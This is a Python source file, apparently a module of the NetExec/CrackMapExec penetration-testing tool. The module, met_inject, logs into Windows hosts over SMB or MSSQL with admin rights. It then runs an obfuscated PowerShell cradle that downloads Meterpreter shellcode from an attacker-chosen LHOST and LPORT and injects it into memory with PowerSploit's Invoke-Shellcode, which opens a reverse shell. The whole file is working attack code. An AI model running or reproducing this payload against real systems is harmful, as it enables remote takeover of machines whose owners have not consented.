NetExec/cme/modules/met_inject.py

76 lines
3.0 KiB
Python

from cme.helpers.powershell import *
from sys import exit
class CMEModule:
'''
Downloads the Meterpreter stager and injects it into memory using PowerSploit's Invoke-Shellcode.ps1 script
Module by @byt3bl33d3r
'''
name = 'met_inject'
description = "Downloads the Meterpreter stager and injects it into memory"
supported_protocols = ['smb', 'mssql']
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
'''
LHOST IP hosting the handler
LPORT Handler port
PAYLOAD Payload to inject: reverse_http or reverse_https (default: reverse_https)
PROCID Process ID to inject into (default: current powershell process)
'''
self.met_payload = 'reverse_https'
self.procid = None
if not 'LHOST' in module_options or not 'LPORT' in module_options:
context.log.error('LHOST and LPORT options are required!')
exit(1)
if 'PAYLOAD' in module_options:
self.met_payload = module_options['PAYLOAD']
if 'PROCID' in module_options:
self.procid = module_options['PROCID']
self.lhost = module_options['LHOST']
self.lport = module_options['LPORT']
self.ps_script = obfs_ps_script('powersploit/CodeExecution/Invoke-Shellcode.ps1')
def on_admin_login(self, context, connection):
#PowerSploit's 3.0 update removed the Meterpreter injection options in Invoke-Shellcode
#so now we have to manually generate a valid Meterpreter request URL and download + exec the staged shellcode
payload = """$CharArray = 48..57 + 65..90 + 97..122 | ForEach-Object {{[Char]$_}}
$SumTest = $False
while ($SumTest -eq $False)
{{
$GeneratedUri = $CharArray | Get-Random -Count 4
$SumTest = (([int[]] $GeneratedUri | Measure-Object -Sum).Sum % 0x100 -eq 92)
}}
$RequestUri = -join $GeneratedUri
$Request = "{}://{}:{}/$($RequestUri)"
$WebClient = New-Object System.Net.WebClient
[Byte[]]$bytes = $WebClient.DownloadData($Request)
Invoke-Shellcode -Force -Shellcode $bytes""".format('http' if self.met_payload == 'reverse_http' else 'https',
self.lhost,
self.lport)
if self.procid:
payload += " -ProcessID {}".format(self.procid)
launcher = gen_ps_iex_cradle(context, 'Invoke-Shellcode.ps1', payload, post_back=False)
ps_command = create_ps_command(launcher, force_ps32=True)
connection.execute(ps_command)
context.log.success('Executed payload')
def on_request(self, context, request):
if 'Invoke-Shellcode.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
request.wfile.write(self.ps_script)
request.stop_tracking_host()
else:
request.send_response(404)
request.end_headers()